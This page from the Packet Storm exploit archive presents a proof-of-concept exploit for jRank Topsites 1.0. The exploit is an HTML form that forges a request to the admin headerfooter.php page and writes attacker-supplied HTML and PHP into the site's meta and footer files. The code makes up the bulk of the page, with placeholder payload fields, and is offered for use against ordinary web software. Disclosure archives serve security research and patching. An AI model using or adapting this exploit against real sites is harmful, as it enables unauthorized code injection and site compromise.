Exploit the possiblities

jRank Topsites 1.0 Cross Site Request Forgery / Code Injection

jRank Topsites 1.0 Cross Site Request Forgery / Code Injection
Posted Sep 9, 2017
Authored by Ihsan Sencan

jRank Topsites version 1.0 suffers from a cross site request forgery vulnerability that allows for PHP code injection vulnerability.

tags | exploit, php, csrf
MD5 | f9c9dacf3c805760fedafa777dff54be

jRank Topsites 1.0 Cross Site Request Forgery / Code Injection

Change Mirror Download
<!--
# # # # #
# Exploit Title: jRank - Topsites Script 1.0 - Cross-Site Request Forgery
# Dork: N/A
# Date: 10.09.2017
# Vendor Homepage: https://topsitesscript.com/
# Software Link: https://topsitesscript.com/topsites-script-demo/
# Demo: http://www.topsitesscript.com/demo/
# Version: 1.0
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
-->
<form action="http://localhost/[PATH]/admin/headerfooter.php" method="post">
<input name="action" value="edit" type="hidden">
<table width="95%" cellspacing="1" cellpadding="3" border="0" align="center">
<tbody>
<tr bgcolor="#3498DB">
<td><b style="color:#FFFFFF;">Meta Tags File</b></td>
</tr>
<tr bgcolor="#FFFFFF">
<td>
<textarea cols="10" rows="2" name="meta" style="width: 100%">
<!--
Html Code etc.....
-->
</textarea>
</td>
</tr>
</tbody>
</table>
<table width="95%" cellspacing="1" cellpadding="3" border="0" align="center">
<tbody>
<tr bgcolor="#3498DB">
<td><b style="color:#FFFFFF;">Footer File</b></td>
</tr>
<tr bgcolor="#FFFFFF">
<td><textarea cols="60" rows="7" name="footer" style="width: 100%">
<!--
Php Code etc.....
-->
</textarea>
</td>
</tr>
<tr bgcolor="#FFFFFF">
<td>
<font face="verdana" size="2"><center><input name="submit" value="Edit" type="submit"></center></font>
</td>
</tr>
</tbody>
</table>
</form>

Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

Want To Donate?


Bitcoin: 18PFeCVLwpmaBuQqd5xAYZ8bZdvbyEWMmU

File Archive:

February 2018

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Feb 1st
    15 Files
  • 2
    Feb 2nd
    15 Files
  • 3
    Feb 3rd
    15 Files
  • 4
    Feb 4th
    13 Files
  • 5
    Feb 5th
    16 Files
  • 6
    Feb 6th
    15 Files
  • 7
    Feb 7th
    15 Files
  • 8
    Feb 8th
    15 Files
  • 9
    Feb 9th
    18 Files
  • 10
    Feb 10th
    8 Files
  • 11
    Feb 11th
    8 Files
  • 12
    Feb 12th
    17 Files
  • 13
    Feb 13th
    15 Files
  • 14
    Feb 14th
    15 Files
  • 15
    Feb 15th
    17 Files
  • 16
    Feb 16th
    18 Files
  • 17
    Feb 17th
    37 Files
  • 18
    Feb 18th
    2 Files
  • 19
    Feb 19th
    16 Files
  • 20
    Feb 20th
    16 Files
  • 21
    Feb 21st
    15 Files
  • 22
    Feb 22nd
    16 Files
  • 23
    Feb 23rd
    31 Files
  • 24
    Feb 24th
    0 Files
  • 25
    Feb 25th
    0 Files
  • 26
    Feb 26th
    0 Files
  • 27
    Feb 27th
    0 Files
  • 28
    Feb 28th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2018 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close